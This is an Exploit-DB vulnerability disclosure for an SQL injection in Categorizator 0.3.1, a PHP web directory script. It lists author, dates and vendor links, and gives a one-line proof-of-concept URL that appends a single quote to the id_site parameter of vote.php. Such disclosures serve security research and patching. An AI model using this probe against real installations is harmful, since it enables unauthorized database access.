Categorizator 0.3.1 - SQL Injection

EDB-ID:

40511

CVE:

N/A


Author:

Wadeek

Type:

webapps


Platform:

PHP

Date:

2016-10-12


# Exploit Title: Categorizator 0.3.1 | SQL Injection
# Date: 03/09/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://lelogiciellibre.net/telecharger/annuaire-web.php
# Software Link: ftp://ftp2.lelogiciellibre.net/lelogiciellibre/annu/categorizator031.zip
# Version: 0.3.1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools

################################################################
PoC : http://localhost/cms/categorizator/vote.php?id_site=1'
################################################################